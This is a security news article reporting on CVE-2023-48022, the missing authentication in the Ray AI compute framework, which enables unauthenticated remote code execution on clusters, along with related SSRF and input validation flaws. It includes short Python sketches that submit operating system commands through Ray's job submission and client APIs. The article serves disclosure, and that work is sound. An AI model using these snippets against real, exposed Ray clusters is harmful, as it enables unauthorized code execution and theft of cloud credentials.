Critical Vulnerability Found in Ray AI Framework 

A critical issue in open source AI framework Ray could provide attackers with operating system access to all nodes.

A critical vulnerability in Ray, an open source compute framework for AI, could allow unauthorized access to all nodes, cybersecurity firm Bishop Fox warns.

Tracked as CVE-2023-48022, the bug exists because Ray does not properly enforce authentication on at least two of its components, namely the dashboard and client.

A remote attacker can abuse this issue to submit or delete jobs without authentication. Furthermore, the attacker could retrieve sensitive information and execute arbitrary code, Bishop Fox says.

“The vulnerability could be exploited to obtain operating system access to all nodes in the Ray cluster or attempt to retrieve Ray EC2 instance credentials (in a typical AWS cloud install),” the cybersecurity firm notes.

CVE-2023-48022 is rooted in the fact that Ray, in its default configuration, does not enforce authentication and does not appear to support any authorization model, although an optional mutual TLS authentication mode is described in the framework’s documentation.

“In other words, even if a Ray administrator explicitly enabled TLS authentication, they would be unable to grant users different permissions, such as read-only access to the Ray dashboard,” Bishop Fox says.
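For context, the mutual TLS mode that Ray’s documentation describes is enabled through environment variables rather than any per-user permission system. The sketch below shows the general shape of that configuration as documented; the certificate paths are placeholders, and exact variable names may vary by Ray version.

# Sketch of Ray's documented mutual TLS mode, set before starting Ray processes.
# Paths are placeholders; variable names follow Ray's TLS documentation.
import os

os.environ["RAY_USE_TLS"] = "1"                          # enable TLS on Ray's gRPC channels
os.environ["RAY_TLS_SERVER_CERT"] = "/etc/ray/tls/server.crt"
os.environ["RAY_TLS_SERVER_KEY"] = "/etc/ray/tls/server.key"
os.environ["RAY_TLS_CA_CERT"] = "/etc/ray/tls/ca.crt"    # CA used to verify peer certificates

# As Bishop Fox notes, this only authenticates connections; it provides
# no per-user authorization (for example, read-only dashboard access).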

According to the cybersecurity firm, attackers could exploit CVE-2023-48022 via the job submission API by submitting arbitrary operating system commands.
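As a minimal illustration of that exploitation path, the Python sketch below uses Ray’s job submission client to pass a shell command as a job entrypoint. The host name and command are placeholders; the point is simply that the default configuration asks for no credentials.

# Hypothetical sketch: submitting an OS command as a Ray job entrypoint.
# "head-node" is a placeholder for a reachable Ray dashboard (port 8265 by default).
from ray.job_submission import JobSubmissionClient

# No credentials are required in Ray's default configuration.
client = JobSubmissionClient("http://head-node:8265")

# The entrypoint is executed as a shell command on the cluster, so any OS
# command placed here runs with the privileges of the Ray worker process.
job_id = client.submit_job(entrypoint="id && hostname")
print(client.get_job_status(job_id))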

Ray’s lack of authentication leads to other security vulnerabilities, including issues that were recently disclosed by Protect AI, which manages Huntr, the bug bounty platform for AI and ML.


Bishop Fox says it independently identified two of these issues and reported them to Ray’s maintainers (Anyscale) around the same time as Protect AI.

“However, the reports were closed based on Anyscale’s position that unauthenticated remote code execution is intentional, and therefore should not be considered a vulnerability,” the cybersecurity firm says.

Furthermore, the company says, the Ray Jobs Python SDK can be used for unauthenticated remote code execution by crafting a malicious script that uses the Ray API for task submission. The Ray client API can likewise be abused for unauthenticated remote code execution.
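A minimal sketch of the client API path is shown below, assuming an exposed Ray client endpoint (port 10001 by default); the host name and command are placeholders.

# Hypothetical sketch of abuse via the Ray client API ("ray://" endpoint).
import subprocess
import ray

# With no authentication enforced, any reachable client port accepts the connection.
ray.init(address="ray://head-node:10001")

@ray.remote
def run_command(cmd: str) -> str:
    # Remote tasks execute on cluster workers, so the command runs on a remote node.
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

print(ray.get(run_command.remote("id && hostname")))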

Bishop Fox draws attention to other critical-severity vulnerabilities in Ray as well, including a server-side request forgery (SSRF) bug (CVE-2023-48023) and an insecure input validation flaw (CVE-2023-6021) that Protect AI reported to the vendor this summer.

At least some of these issues, the cybersecurity firm notes, remain unpatched, as the vendor either does not recognize them as security defects or does not want to address them.

Update: The CVE IDs for the missing authentication and SSRF vulnerabilities have been corrected; Bishop Fox had swapped them in its initial post.

Related: OpenAI Patches Account Takeover Vulnerabilities in ChatGPT

Related: US, UK Cybersecurity Agencies Publish AI Development Guidance

Related: CISA Outlines AI-Related Cybersecurity Efforts

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
